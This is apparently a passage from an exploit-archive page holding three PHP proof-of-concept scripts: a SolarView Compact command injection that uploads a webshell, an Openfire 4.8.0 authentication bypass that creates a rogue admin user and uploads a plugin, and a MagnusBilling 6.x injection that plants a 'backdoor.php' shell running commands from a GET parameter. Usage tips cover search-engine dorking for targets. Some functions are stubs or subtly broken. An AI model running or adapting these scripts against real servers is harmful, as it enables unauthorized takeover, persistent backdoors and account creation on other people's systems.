        if ($pngWebshell === null) {  
            return null;  
        }

        // Encode webshell data and write to file on the target at the tmp directory for execution  
        $payload = base64_encode($pngWebshell);  
        $cmd = "echo {$payload}|base64 -d >tmp/{$this->webshellName}";  
        return $this->executeCommand($cmd);  
    }

    public function executePhp($cmd) {  
        $payload = base64_encode($cmd);  
        return $this->sendRequest('POST', "/tmp/{$this->webshellName}", [  
            $this->postParam => $payload  
        ]);  
    }

    public function executeCommand($cmd) {  
        // Encode payload with base64 to ensure proper execution  
        $payload = base64_encode($cmd);  
        $cmd = "echo {$payload}|base64 -d|bash";  
        return $this->sendRequest('GET', '/downloader.php', [  
            'file' => ";{$cmd};.zip"  
        ]);  
    }

    public function check() {  
        // Checking if the target is vulnerable by echoing a randomised marker  
        echo "Checking if {$this->targetUri} can be exploited.\n";  
        $marker = $this->generateRandomString(16);  
        $res = $this->executeCommand("echo {$marker};cat /opt/svc/version");

        if ($res && $res['code'] == 200 && strpos($res['body'], $marker) !== false) {  
            if (preg_match('/SolarView Compact ver\.\d\.\d\d/', $res['body'], $matches)) {  
                return "Vulnerable: " . $matches[0];  
            }  
        }  
        return 'Safe: No valid response received from the target.';  
    }

    public function exploit($payload) {  
        echo "Executing payload on {$this->targetUri}.\n";  
        $res = $this->uploadWebshell();

        if (!$res || $res['code'] !== 200) {  
            throw new Exception('Web shell upload error.');  
        }

        $this->executePhp($payload);  
    }

    private function sendRequest($method, $uri, $params) {  
        $url = $this->targetUri . $uri;  
        $options = [  
            'http' => [  
                'method' => $method,  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'timeout' => $this->timeout,  
                'content' => http_build_query($params)  
            ]  
        ];

        $context = stream_context_create($options);  
        $response = @file_get_contents($url, false, $context);  
        $code = isset($http_response_header[0]) ? intval(substr($http_response_header[0], 9, 3)) : 0;

        return [  
            'code' => $code,  
            'body' => $response  
        ];  
    }

    private function injectPhpPayloadPng($phpPayload) {  
        // Here you would implement the logic to inject the PHP payload into a PNG file.  
        // This is a placeholder implementation.  
        return $phpPayload; // Modify this to return the actual PNG with embedded PHP payload.  
    }

    private function generateRandomFileName($length = 16) {  
        return bin2hex(random_bytes($length / 2)) . '.php';  
    }

    private function generateRandomString($length) {  
        return bin2hex(random_bytes($length / 2));  
    }  
}

// Example of usage  
$targetUri = 'http://target-ip'; // Replace with the actual target URL  
$exploit = new SolarViewExploit($targetUri);  
echo $exploit->check();  
$exploit->exploit('whoami'); // Replace with your payload

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

SolarView Compact 6.00 Code Injection

Openfire version 4.8.0 suffers from authentication bypass and code injection vulnerabilities.

    =============================================================================================================================================| # Title     : Openfire release 4.8.0 Code Injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.igniterealtime.org/projects/openfire/                                                                           |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 115 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass OpenfireExploit{    private $targetUrl;    private $adminUsername;    private $adminPassword;    private $pluginName;    private $csrfToken;    public function __construct($targetUrl, $adminUsername = null, $adminPassword = null, $pluginName = null)    {        $this->targetUrl = rtrim($targetUrl, '/') . '/';        $this->adminUsername = $adminUsername ?? $this->generateRandomString(8, 15);        $this->adminPassword = $adminPassword ?? $this->generateRandomPassword(8, 10);        $this->pluginName = $pluginName ?? $this->generateRandomString(8, 15);    }    private function generateRandomString($minLength, $maxLength)    {        $length = rand($minLength, $maxLength);        return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);    }    private function generateRandomPassword($minLength, $maxLength)    {        return bin2hex(random_bytes(rand($minLength, $maxLength) / 2));    }    private function sendRequest($method, $uri, $data = null, $headers = [])    {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $this->targetUrl . $uri);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        return curl_exec($ch);    }    private function getCsrfToken()    {        $response = $this->sendRequest('GET', 'login.jsp');        preg_match('/csrf=([^;]+)/', $response, $matches);        return $matches[1] ?? null;    }    private function authBypass()    {        $this->sendRequest('GET', 'setup/setup-s/../../../../user-groups.jsp');        // Check if we can access the user-groups.jsp page        return $this->sendRequest('GET', 'setup/setup-s/../../../../user-groups.jsp') !== false;    }    private function addAdminUser()    {        $this->csrfToken = $this->getCsrfToken();        $data = http_build_query([            'csrf' => $this->csrfToken,            'username' => $this->adminUsername,            'password' => $this->adminPassword,            'passwordConfirm' => $this->adminPassword,            'isadmin' => 'on',            'create' => 'Create User'        ]);        return $this->sendRequest('POST', 'setup/setup-s/../../../../user-create.jsp', $data);    }    private function uploadPlugin($pluginFilePath)    {        $this->csrfToken = $this->getCsrfToken();        $cfile = new CURLFile($pluginFilePath);        $data = [            'uploadfile' => $cfile,            'csrf' => $this->csrfToken        ];        $headers = ['Content-Type: multipart/form-data'];        return $this->sendRequest('POST', 'plugin-admin.jsp', $data, $headers);    }    public function exploit()    {        if ($this->authBypass()) {            echo "Authentication bypass successful.\n";            if ($this->addAdminUser()) {                echo "Admin user '{$this->adminUsername}' added successfully.\n";                // Prepare plugin JAR file path                $pluginJarPath = '/path/to/plugin.jar'; // Replace with actual path to the JAR file                if ($this->uploadPlugin($pluginJarPath)) {                    echo "Plugin uploaded successfully.\n";                } else {                    echo "Failed to upload plugin.\n";                }            } else {                echo "Failed to add admin user.\n";            }        } else {            echo "Authentication bypass failed.\n";        }    }}// Usage$exploit = new OpenfireExploit('http://target-openfire-url.com');$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Openfire 4.8.0 Code Injection

MagnusBilling version 6.x suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : MagnusBilling 6.x Code Injection Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.magnusbilling.org/                                                                                              |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 83 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class MagnusBillingExploit {  
    private $targetUri;  
    private $webShellName;

    public function __construct($targetUri) {  
        $this->targetUri = $targetUri;  
    }

    // Function to execute commands on the target  
    public function executeCommand($cmd) {  
        $url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#';  
        return file_get_contents($url); // Send HTTP request  
    }

    // Function to execute PHP code on the target  
    public function executePhp($cmd) {  
        $payload = base64_encode($cmd);  
        $url = $this->targetUri . '/lib/icepay/' . $this->webShellName;  
        $postFields = [$this->postParam => $payload];  
        return $this->sendPostRequest($url, $postFields); // Send POST request  
    }

    // Upload backdoor webshell to the target  
    public function uploadBackdoorWebShell() {  
        // Name of the webshell to be uploaded  
        $this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file

        // Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd')  
        $backdoorCode = "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>";

        // Encode the webshell content  
        $encodedPayload = base64_encode($backdoorCode);

        // Construct the command to upload the backdoor  
        $cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}";

        // Execute the command to upload the backdoor  
        return $this->executeCommand($cmd);  
    }

    // Check if the target can be exploited  
    public function check() {  
        $url = $this->targetUri;  
        $response = file_get_contents($url);  
        if (!$response || !preg_match('/MagnusBilling/i', $response)) {  
            return "Safe: Likely not a MagnusBilling application.";  
        }

        $sleepTime = rand(4, 8);  
        $this->executeCommand("sleep {$sleepTime}");  
        sleep($sleepTime); // Simulate blind command injection

        return "Vulnerable: Command injection successful.";  
    }

    // Main function to exploit the target  
    public function exploit() {  
        echo "Uploading backdoor...\n";  
        $result = $this->uploadBackdoorWebShell();  
        if (!$result) {  
            die("Backdoor upload failed.");  
        }  
        echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n";  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => http_build_query($postFields)  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Usage example  
$exploit = new MagnusBillingExploit('http://target-url/mbilling');  
$exploit->exploit();

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Tag

#google